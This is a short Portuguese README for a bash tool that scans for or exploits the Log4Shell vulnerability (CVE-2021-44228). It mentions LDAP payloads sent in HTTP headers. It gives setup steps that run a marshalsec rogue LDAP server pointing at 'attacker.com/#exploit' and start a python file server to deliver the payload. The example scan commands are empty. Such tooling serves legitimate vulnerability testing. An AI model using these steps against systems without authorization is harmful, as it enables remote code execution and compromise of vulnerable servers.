
Script em bash que permite identificar a vulnerabilidade Log4j CVE-2021-44228 de forma remota.
Script em bash que permite identificar e/ou explorar a vulnerabilidade Log4shell de forma remota. Esta ferramenta realiza diferentes testes usando payloads LDAP e cabeçalhos X-Api-Version, User-Agent e X-Forwarded-For.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Habilitamos um servidor HTTP python3 -m http.server 8080
Ter Java instalado #sudo apt install default-jre
ter Curl instalado #sudo apt-get install curl
Inserir os seguintes parâmetros:
#Exemplo de escaneamento de aplicação em rede interna:

#Exemplo de escaneamento de aplicação na internet:
